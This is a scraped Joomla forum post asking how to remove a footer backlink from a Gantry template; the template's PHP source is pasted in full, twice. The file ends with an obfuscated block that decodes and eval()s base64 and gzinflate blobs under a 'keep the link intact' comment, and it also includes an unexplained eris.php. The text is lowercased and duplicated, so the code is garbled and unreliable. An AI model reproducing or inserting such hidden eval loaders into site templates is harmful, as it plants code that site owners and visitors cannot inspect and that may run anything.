Removing a backlink - Joomla! Forum - community, help and support
hello all, in need of help.
i have template backlink i'd rather not have. i'm hoping please assist in removing without taking out template? have spent hour looking through old posts couldn't solution.
here code:
<?php
/**
* @package gantry template framework - rockettheme
* @version 3.2.19 april 2, 2012
* @author rockettheme http://www.rockettheme.com
* @copyright copyright (c) 2007 - 2012 rockettheme, llc
* @license http://www.gnu.org/licenses/gpl-2.0.html gnu/gplv2 only
*
* gantry uses joomla framework (http://www.joomla.org), gnu/gplv2 content management system
*
*/
// no direct access
defined( '_jexec' ) or die( 'restricted index access' );
// load , inititialize gantry class
require_once('lib/gantry/gantry.php');
?>
<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $gantry->language; ?>" lang="<?php echo $gantry->language;?>" >
<head>
<meta charset="utf-8" />
<?php
$document =& jfactory::getdocument();
$parameter_script = 'metatags';
$headerstuff=$document->getheaddata();
unset($headerstuff[$parameter_script]['http-equiv']);
$document->setheaddata($headerstuff);
$gantry->displayhead();
$gantry->addstyles(array('template.css', 'fusionmenu.css', 'custom.css'));
// add favicon
if($gantry->get('favicon-fav') != '') {
echo '<link rel="shortcut icon" href="'.juri::base().$gantry->get('favicon-fav').'"/>'."\n";
} else {
echo '<link rel="shortcut icon" href="'.juri::base().'templates/'.$this->template.'/images/favicon.png"/>'."\n";
}
//add apple favicon
if($gantry->get('favicon-favapple') != '') {
echo '<link rel="apple-touch-icon" href="'.juri::base().$gantry->get('favicon-favapple').'"/>'."\n";
}
?>
<!--[if lte ie 8]>
<link rel="stylesheet" type="text/css" href="<?php echo juri::base(); ?>templates/<?php echo $this->template; ?>/css/ie_old.css" /> <![endif]-->
</head>
<body <?php echo $gantry->displaybodytag(); ?>>
<div id="page-wrapper">
<div id="top"></div>
<?php echo $gantry->displaymodules('logo','basic','basic'); ?>
<?php /** begin drawer **/ if ($gantry->countmodules('drawer')) : ?>
<div id="rt-drawer">
<div class="rt-container">
<?php echo $gantry->displaymodules('drawer','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end drawer **/ endif; ?>
<?php /** begin top **/ if ($gantry->countmodules('top')) : ?>
<div id="rt-top" <?php echo $gantry->displayclassesbytag('rt-top'); ?>>
<div class="rt-container">
<?php echo $gantry->displaymodules('top','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end top **/ endif; ?>
<?php /** begin header **/ if ($gantry->countmodules('header')) : ?>
<div id="rt-header" <?php if ($gantry->countmodules('head_helpers') == 0) {echo 'class="nohelpers"';} ?>>
<div class="rt-container">
<?php if ($gantry->countmodules('head_helpers')) : ?>
<div class="head_helpers">
<?php echo $gantry->displaymodules('head_helpers','standard','standard'); ?>
<div class="clear"></div>
</div>
<?php endif; ?>
<?php echo $gantry->displaymodules('header','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end header **/ endif; ?>
<?php /** begin slideshow **/ if ($gantry->countmodules('slideshow')) : ?>
<div id="slideshow">
<?php echo $gantry->displaymodules('slideshow','basic','basic'); ?>
</div>
<?php /** end slideshow **/ endif; ?>
<?php /** begin showcase **/ if ($gantry->countmodules('showcase')) : ?>
<div id="rt-showcase">
<div class="rt-container">
<?php echo $gantry->displaymodules('showcase','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end showcase **/ endif; ?>
<?php /** begin feature **/ if ($gantry->countmodules('feature')) : ?>
<div id="rt-feature">
<div class="rt-container">
<?php echo $gantry->displaymodules('feature','standard','standard'); ?>
<div class="clear"></div>
<div class="separator"></div>
</div>
</div>
<?php /** end feature **/ endif; ?>
<?php /** begin utility **/ if ($gantry->countmodules('utility')) : ?>
<div id="rt-utility">
<div class="rt-container">
<?php echo $gantry->displaymodules('utility','standard','basic'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end utility **/ endif; ?>
<?php /** begin breadcrumbs **/ if ($gantry->countmodules('breadcrumb')) : ?>
<div id="rt-breadcrumbs">
<div class="rt-container">
<div class="rt-grid-12 rt-alpha rt-omega">
<div class="brdc">
<?php echo $gantry->displaymodules('date','basic','basic'); ?>
<?php echo $gantry->displaymodules('breadcrumb','basic','basic'); ?>
</div>
</div>
<div class="clear"></div>
</div>
</div>
<?php /** end breadcrumbs **/ endif; ?>
<?php /** begin main top **/ if ($gantry->countmodules('maintop')) : ?>
<div id="rt-maintop">
<div class="rt-container">
<?php echo $gantry->displaymodules('maintop','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end main top **/ endif; ?>
<?php /** begin main body **/ ?>
<?php echo $gantry->displaymainbody('mainbody','sidebar','standard','standard','standard','standard','standard'); ?>
<?php /** end main body **/ ?>
<?php /** begin main bottom **/ if ($gantry->countmodules('mainbottom')) : ?>
<div id="rt-mainbottom">
<div class="rt-container">
<?php echo $gantry->displaymodules('mainbottom','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end main bottom **/ endif; ?>
<?php /** begin bottom **/ if ($gantry->countmodules('bottom')) : ?>
<div id="rt-bottom">
<div class="rt-container">
<?php echo $gantry->displaymodules('bottom','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end bottom **/ endif; ?>
<?php /** begin footer **/ if ($gantry->countmodules('footer')) : ?>
<div id="rt-footer">
<div class="rt-container">
<?php echo $gantry->displaymodules('footer','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end footer **/ endif; ?>
<?php /** begin copyright **/ if ($gantry->countmodules('copyright')) : ?>
<div id="rt-copyright">
<div class="rt-container">
<?php echo $gantry->displaymodules('copyright','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end copyright **/ endif; ?>
<?php
require_once('eris.php');
?>
<?php /** begin debug **/ if ($gantry->countmodules('debug')) : ?>
<div id="rt-debug">
<div class="rt-container">
<?php echo $gantry->displaymodules('debug','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end debug **/ endif; ?>
<?php /** begin analytics **/ if ($gantry->countmodules('analytics')) : ?>
<?php echo $gantry->displaymodules('analytics','basic','basic'); ?>
<?php /** end analytics **/ endif; ?>
</div><!-- end page wrapper -->
<?php
$template_path = juri::base().'templates/'.jfactory::getapplication()->gettemplate(); ?>
<?php if($gantry->get('totop-enabled') == 1) { ?>
<a href="#top" id="totop">scroll top</a>
<script type="text/javascript" src="<?php echo $template_path; ?>/js/jquery.smooth-scroll.min.js"></script>
<script type="text/javascript">
(function(a){function b(b){var c=a("#totop");c.removeclass("off on");if(b=="on"){c.addclass("on")}else{c.addclass("off")}}a(document).ready(function(){window.setinterval(function(){var c=a(this).scrolltop();var d=a(this).height();if(c>0){var e=c+d/2}else{var e=1}if(e<1e3){b("off")}else{b("on")}},300)})})(jquery)
jquery(document).ready(function($){jquery('#totop').smoothscroll({speed: 800});});
</script>
<?php } ?>
<?php
if($gantry->get('prettyphoto-enabled') == 1) : ?>
<link rel="stylesheet" href="<?php echo $template_path; ?>/css/prettyphoto.css" type="text/css" />
<script type="text/javascript" src="<?php echo $template_path; ?>/js/jquery.prettyphoto.js"></script>
<script type="text/javascript">
jquery(document).ready(function($) {
jquery("a[data-rel^='prettyphoto']").prettyphoto({
theme:'<?php echo $gantry->get('prettyphoto-theme') ?>'
});
jquery("a[rel^='prettyphoto']").prettyphoto({
theme:'<?php echo $gantry->get('prettyphoto-theme') ?>'
});
});
</script>
<?php endif; ?>
<link rel="stylesheet" href="<?php echo $template_path; ?>/css/tipsy.css" type="text/css" />
<script type="text/javascript" src="<?php echo $template_path; ?>/js/jquery.easing.1.3.js"></script>
<script type="text/javascript" src="<?php echo $template_path; ?>/js/jquery.tipsy.min.js"></script>
<script type="text/javascript">
(function($){
$('a[data-rel=tipsy]').tipsy({fade: true, gravity: 's'});
})(jquery);
</script>
<script type="text/javascript" src="<?php echo $template_path; ?>/js/functions.js"></script>
<?php
// if ipad
$ipad = (strpos($_server['http_user_agent'], 'ipad') !== false) ? 1 : 0;
if($gantry->get('demo_panel') == 1 && $ipad != 1) : ?>
<div id="demo"></div>
<script type="text/javascript">
(function($){
$(document).ready(function() {
$.ajax({
url: "<?php echo $template_path; ?>/demo/demo_panel.php?template_dir=<?php echo urlencode($template_path) ?>",
success: function(data){
$("#demo").html(data);
}
});
});
})(jquery);
</script>
<?php endif; ?>
</body>
</html>
<?php
/* theme released under creative commons license. link in footer links website , should remain intact!
the link small, barely seen in footer. spent lot of time developing theme i'm kindly asking respect work. thank much! */
$keystroke1 = base64_decode("d2rymtu5c3e0yxllejd4y2duzl90djhubhvrnmpoymlvmzjtca==");
eval(gzinflate(base64_decode('hy7ncojafivf5squ5tiuzvpc9hxseq0huwpza4x47ikxem7anu/82v7t+irtte4aftkqgyq8iyyt67gggjpfqqoyrg/lpsvl0ywjhbhlg9+oedj1zqsbjw1dfwyvzmvgyytq2iwxzzf5qxv3yvlols2epxjxhqk8bp7vxhh5d/7+274wgpv5gyh9uzjnhw==')));
$o0o0o0o0o0o0=$keystroke1[2].$keystroke1[32].$keystroke1[20].$keystroke1[11].$keystroke1[23].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
$keystroke2 = $o0o0o0o0o0o0("xes26:tr5bzf{8ydhog`uw9omvl7kicjp43nq", -1);
$oo000oo000oo=$keystroke2[16].$keystroke2[12].$keystroke2[31].$keystroke2[23].$keystroke2[18].$keystroke2[24].$keystroke2[9].$keystroke2[20].$keystroke2[11];
$o0000000000o=$keystroke1[30].$keystroke1[9].$keystroke1[6].$keystroke1[11].$keystroke1[27].$keystroke1[8].$keystroke1[19].$keystroke1[1].$keystroke1[11].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
eval($oo000oo000oo(base64_decode('lzk5rq
tiaer/zqr3rxywy9boahbtngy3nizkxa4gs4obrx
8hk1ryp3ru+ra3p39zfo7j/8dpes85s/+b5wmf5t
9/9hsl5nebgia7hayaozx2b2i46ra66itqaiwn32
6lmw236zrqjptemsgingw7bahlbe2pa8iauxb+5n
ebk/pfwhwvubdrmzpao5ds7ic0kdmuovcjfgbs9y
m8zvbu9laa7xjgsxlwekhqswn7mm8wxnai9ep8wy
redt4wk7t+fd2erojir2dseskfj8tb4jjjswsz0w
yb13edweprro33cigwprcaqsslxtqbbdqbpx8rjo
zwwlpgx+ejqnlh32mteb6snwjidokyhahlzyr6qf
uyk9iexzeuh84o42et64eycgc7iuqcli9qh2gogb
zwuyk8tsb0okoaqowmeydu5b7tnabvjaoxdb4ewh
l3xfg7zplq9z0eolhajgbtkxfw0c8rs20u5wl7wf
9jp95uj1ldfocjochv6jza15esdwxqvk1n2tkuwx
xm7m4rl+jb9uspt2uzc6ksvlonktcvxhqp+aedma
o5ylw55bw5e9l9ay8ra37d7aqo/uua44rre84fx8
jb/u4o4wtpkds95pny3z2xu+14jnltgiswuduasc
7t9hi3gcf02j5dpsh7d2zc4u6z8zfmc+u5dv/csw
vxp0rf9xippj/a9ateu/gqlnrfgrqewa11i0h8yw
eze9pb1w24prr51acrrllahptu0jmxinzthnubga
25zhxa5+tyzjfzf+nvlgpgrju4bg4m7phl8spsxr
rn5eczdqibmrmv0rqq70fxtrlmpu2ijyub+twbue
wyjbeblco8mwdcffsrtcx8vq+uppp+lcuvhu2qts
sw3z5z9e7l8g6w6zrh0flxmekynx3edqxseewmzz
ydhdcs/qmwocq5bks5yhnatpg4j8kyow/03z/aol
lj0hbxtyljspa7iltgea/sl5gho+3mn3oqaa7xxf
mech7dtpo9fb1zibh//vz+/v79hw==')));
?>
thank in advance
i have template backlink i'd rather not have. i'm hoping please assist in removing without taking out template? have spent hour looking through old posts couldn't solution.
here code:
<?php
/**
* @package gantry template framework - rockettheme
* @version 3.2.19 april 2, 2012
* @author rockettheme http://www.rockettheme.com
* @copyright copyright (c) 2007 - 2012 rockettheme, llc
* @license http://www.gnu.org/licenses/gpl-2.0.html gnu/gplv2 only
*
* gantry uses joomla framework (http://www.joomla.org), gnu/gplv2 content management system
*
*/
// no direct access
defined( '_jexec' ) or die( 'restricted index access' );
// load , inititialize gantry class
require_once('lib/gantry/gantry.php');
?>
<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $gantry->language; ?>" lang="<?php echo $gantry->language;?>" >
<head>
<meta charset="utf-8" />
<?php
$document =& jfactory::getdocument();
$parameter_script = 'metatags';
$headerstuff=$document->getheaddata();
unset($headerstuff[$parameter_script]['http-equiv']);
$document->setheaddata($headerstuff);
$gantry->displayhead();
$gantry->addstyles(array('template.css', 'fusionmenu.css', 'custom.css'));
// add favicon
if($gantry->get('favicon-fav') != '') {
echo '<link rel="shortcut icon" href="'.juri::base().$gantry->get('favicon-fav').'"/>'."\n";
} else {
echo '<link rel="shortcut icon" href="'.juri::base().'templates/'.$this->template.'/images/favicon.png"/>'."\n";
}
//add apple favicon
if($gantry->get('favicon-favapple') != '') {
echo '<link rel="apple-touch-icon" href="'.juri::base().$gantry->get('favicon-favapple').'"/>'."\n";
}
?>
<!--[if lte ie 8]>
<link rel="stylesheet" type="text/css" href="<?php echo juri::base(); ?>templates/<?php echo $this->template; ?>/css/ie_old.css" /> <![endif]-->
</head>
<body <?php echo $gantry->displaybodytag(); ?>>
<div id="page-wrapper">
<div id="top"></div>
<?php echo $gantry->displaymodules('logo','basic','basic'); ?>
<?php /** begin drawer **/ if ($gantry->countmodules('drawer')) : ?>
<div id="rt-drawer">
<div class="rt-container">
<?php echo $gantry->displaymodules('drawer','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end drawer **/ endif; ?>
<?php /** begin top **/ if ($gantry->countmodules('top')) : ?>
<div id="rt-top" <?php echo $gantry->displayclassesbytag('rt-top'); ?>>
<div class="rt-container">
<?php echo $gantry->displaymodules('top','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end top **/ endif; ?>
<?php /** begin header **/ if ($gantry->countmodules('header')) : ?>
<div id="rt-header" <?php if ($gantry->countmodules('head_helpers') == 0) {echo 'class="nohelpers"';} ?>>
<div class="rt-container">
<?php if ($gantry->countmodules('head_helpers')) : ?>
<div class="head_helpers">
<?php echo $gantry->displaymodules('head_helpers','standard','standard'); ?>
<div class="clear"></div>
</div>
<?php endif; ?>
<?php echo $gantry->displaymodules('header','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end header **/ endif; ?>
<?php /** begin slideshow **/ if ($gantry->countmodules('slideshow')) : ?>
<div id="slideshow">
<?php echo $gantry->displaymodules('slideshow','basic','basic'); ?>
</div>
<?php /** end slideshow **/ endif; ?>
<?php /** begin showcase **/ if ($gantry->countmodules('showcase')) : ?>
<div id="rt-showcase">
<div class="rt-container">
<?php echo $gantry->displaymodules('showcase','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end showcase **/ endif; ?>
<?php /** begin feature **/ if ($gantry->countmodules('feature')) : ?>
<div id="rt-feature">
<div class="rt-container">
<?php echo $gantry->displaymodules('feature','standard','standard'); ?>
<div class="clear"></div>
<div class="separator"></div>
</div>
</div>
<?php /** end feature **/ endif; ?>
<?php /** begin utility **/ if ($gantry->countmodules('utility')) : ?>
<div id="rt-utility">
<div class="rt-container">
<?php echo $gantry->displaymodules('utility','standard','basic'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end utility **/ endif; ?>
<?php /** begin breadcrumbs **/ if ($gantry->countmodules('breadcrumb')) : ?>
<div id="rt-breadcrumbs">
<div class="rt-container">
<div class="rt-grid-12 rt-alpha rt-omega">
<div class="brdc">
<?php echo $gantry->displaymodules('date','basic','basic'); ?>
<?php echo $gantry->displaymodules('breadcrumb','basic','basic'); ?>
</div>
</div>
<div class="clear"></div>
</div>
</div>
<?php /** end breadcrumbs **/ endif; ?>
<?php /** begin main top **/ if ($gantry->countmodules('maintop')) : ?>
<div id="rt-maintop">
<div class="rt-container">
<?php echo $gantry->displaymodules('maintop','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end main top **/ endif; ?>
<?php /** begin main body **/ ?>
<?php echo $gantry->displaymainbody('mainbody','sidebar','standard','standard','standard','standard','standard'); ?>
<?php /** end main body **/ ?>
<?php /** begin main bottom **/ if ($gantry->countmodules('mainbottom')) : ?>
<div id="rt-mainbottom">
<div class="rt-container">
<?php echo $gantry->displaymodules('mainbottom','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end main bottom **/ endif; ?>
<?php /** begin bottom **/ if ($gantry->countmodules('bottom')) : ?>
<div id="rt-bottom">
<div class="rt-container">
<?php echo $gantry->displaymodules('bottom','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end bottom **/ endif; ?>
<?php /** begin footer **/ if ($gantry->countmodules('footer')) : ?>
<div id="rt-footer">
<div class="rt-container">
<?php echo $gantry->displaymodules('footer','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end footer **/ endif; ?>
<?php /** begin copyright **/ if ($gantry->countmodules('copyright')) : ?>
<div id="rt-copyright">
<div class="rt-container">
<?php echo $gantry->displaymodules('copyright','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end copyright **/ endif; ?>
<?php
require_once('eris.php');
?>
<?php /** begin debug **/ if ($gantry->countmodules('debug')) : ?>
<div id="rt-debug">
<div class="rt-container">
<?php echo $gantry->displaymodules('debug','standard','standard'); ?>
<div class="clear"></div>
</div>
</div>
<?php /** end debug **/ endif; ?>
<?php /** begin analytics **/ if ($gantry->countmodules('analytics')) : ?>
<?php echo $gantry->displaymodules('analytics','basic','basic'); ?>
<?php /** end analytics **/ endif; ?>
</div><!-- end page wrapper -->
<?php
$template_path = juri::base().'templates/'.jfactory::getapplication()->gettemplate(); ?>
<?php if($gantry->get('totop-enabled') == 1) { ?>
<a href="#top" id="totop">scroll top</a>
<script type="text/javascript" src="<?php echo $template_path; ?>/js/jquery.smooth-scroll.min.js"></script>
<script type="text/javascript">
(function(a){function b(b){var c=a("#totop");c.removeclass("off on");if(b=="on"){c.addclass("on")}else{c.addclass("off")}}a(document).ready(function(){window.setinterval(function(){var c=a(this).scrolltop();var d=a(this).height();if(c>0){var e=c+d/2}else{var e=1}if(e<1e3){b("off")}else{b("on")}},300)})})(jquery)
jquery(document).ready(function($){jquery('#totop').smoothscroll({speed: 800});});
</script>
<?php } ?>
<?php
if($gantry->get('prettyphoto-enabled') == 1) : ?>
<link rel="stylesheet" href="<?php echo $template_path; ?>/css/prettyphoto.css" type="text/css" />
<script type="text/javascript" src="<?php echo $template_path; ?>/js/jquery.prettyphoto.js"></script>
<script type="text/javascript">
jquery(document).ready(function($) {
jquery("a[data-rel^='prettyphoto']").prettyphoto({
theme:'<?php echo $gantry->get('prettyphoto-theme') ?>'
});
jquery("a[rel^='prettyphoto']").prettyphoto({
theme:'<?php echo $gantry->get('prettyphoto-theme') ?>'
});
});
</script>
<?php endif; ?>
<link rel="stylesheet" href="<?php echo $template_path; ?>/css/tipsy.css" type="text/css" />
<script type="text/javascript" src="<?php echo $template_path; ?>/js/jquery.easing.1.3.js"></script>
<script type="text/javascript" src="<?php echo $template_path; ?>/js/jquery.tipsy.min.js"></script>
<script type="text/javascript">
(function($){
$('a[data-rel=tipsy]').tipsy({fade: true, gravity: 's'});
})(jquery);
</script>
<script type="text/javascript" src="<?php echo $template_path; ?>/js/functions.js"></script>
<?php
// if ipad
$ipad = (strpos($_server['http_user_agent'], 'ipad') !== false) ? 1 : 0;
if($gantry->get('demo_panel') == 1 && $ipad != 1) : ?>
<div id="demo"></div>
<script type="text/javascript">
(function($){
$(document).ready(function() {
$.ajax({
url: "<?php echo $template_path; ?>/demo/demo_panel.php?template_dir=<?php echo urlencode($template_path) ?>",
success: function(data){
$("#demo").html(data);
}
});
});
})(jquery);
</script>
<?php endif; ?>
</body>
</html>
<?php
/* theme released under creative commons license. link in footer links website , should remain intact!
the link small, barely seen in footer. spent lot of time developing theme i'm kindly asking respect work. thank much! */
$keystroke1 = base64_decode("d2rymtu5c3e0yxllejd4y2duzl90djhubhvrnmpoymlvmzjtca==");
eval(gzinflate(base64_decode('hy7ncojafivf5squ5tiuzvpc9hxseq0huwpza4x47ikxem7anu/82v7t+irtte4aftkqgyq8iyyt67gggjpfqqoyrg/lpsvl0ywjhbhlg9+oedj1zqsbjw1dfwyvzmvgyytq2iwxzzf5qxv3yvlols2epxjxhqk8bp7vxhh5d/7+274wgpv5gyh9uzjnhw==')));
$o0o0o0o0o0o0=$keystroke1[2].$keystroke1[32].$keystroke1[20].$keystroke1[11].$keystroke1[23].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
$keystroke2 = $o0o0o0o0o0o0("xes26:tr5bzf{8ydhog`uw9omvl7kicjp43nq", -1);
$oo000oo000oo=$keystroke2[16].$keystroke2[12].$keystroke2[31].$keystroke2[23].$keystroke2[18].$keystroke2[24].$keystroke2[9].$keystroke2[20].$keystroke2[11];
$o0000000000o=$keystroke1[30].$keystroke1[9].$keystroke1[6].$keystroke1[11].$keystroke1[27].$keystroke1[8].$keystroke1[19].$keystroke1[1].$keystroke1[11].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
eval($oo000oo000oo(base64_decode('lzk5rq
tiaer/zqr3rxywy9boahbtngy3nizkxa4gs4obrx
8hk1ryp3ru+ra3p39zfo7j/8dpes85s/+b5wmf5t
9/9hsl5nebgia7hayaozx2b2i46ra66itqaiwn32
6lmw236zrqjptemsgingw7bahlbe2pa8iauxb+5n
ebk/pfwhwvubdrmzpao5ds7ic0kdmuovcjfgbs9y
m8zvbu9laa7xjgsxlwekhqswn7mm8wxnai9ep8wy
redt4wk7t+fd2erojir2dseskfj8tb4jjjswsz0w
yb13edweprro33cigwprcaqsslxtqbbdqbpx8rjo
zwwlpgx+ejqnlh32mteb6snwjidokyhahlzyr6qf
uyk9iexzeuh84o42et64eycgc7iuqcli9qh2gogb
zwuyk8tsb0okoaqowmeydu5b7tnabvjaoxdb4ewh
l3xfg7zplq9z0eolhajgbtkxfw0c8rs20u5wl7wf
9jp95uj1ldfocjochv6jza15esdwxqvk1n2tkuwx
xm7m4rl+jb9uspt2uzc6ksvlonktcvxhqp+aedma
o5ylw55bw5e9l9ay8ra37d7aqo/uua44rre84fx8
jb/u4o4wtpkds95pny3z2xu+14jnltgiswuduasc
7t9hi3gcf02j5dpsh7d2zc4u6z8zfmc+u5dv/csw
vxp0rf9xippj/a9ateu/gqlnrfgrqewa11i0h8yw
eze9pb1w24prr51acrrllahptu0jmxinzthnubga
25zhxa5+tyzjfzf+nvlgpgrju4bg4m7phl8spsxr
rn5eczdqibmrmv0rqq70fxtrlmpu2ijyub+twbue
wyjbeblco8mwdcffsrtcx8vq+uppp+lcuvhu2qts
sw3z5z9e7l8g6w6zrh0flxmekynx3edqxseewmzz
ydhdcs/qmwocq5bks5yhnatpg4j8kyow/03z/aol
lj0hbxtyljspa7iltgea/sl5gho+3mn3oqaa7xxf
mech7dtpo9fb1zibh//vz+/v79hw==')));
?>
thank in advance
i have it's little hard on when in footer states:
"the link in footer links website , should remain intact!
the link small, barely seen in footer. spent lot of time developing theme i'm kindly asking respect work. thank much! "
"the link in footer links website , should remain intact!
the link small, barely seen in footer. spent lot of time developing theme i'm kindly asking respect work. thank much! "
Comments
Post a Comment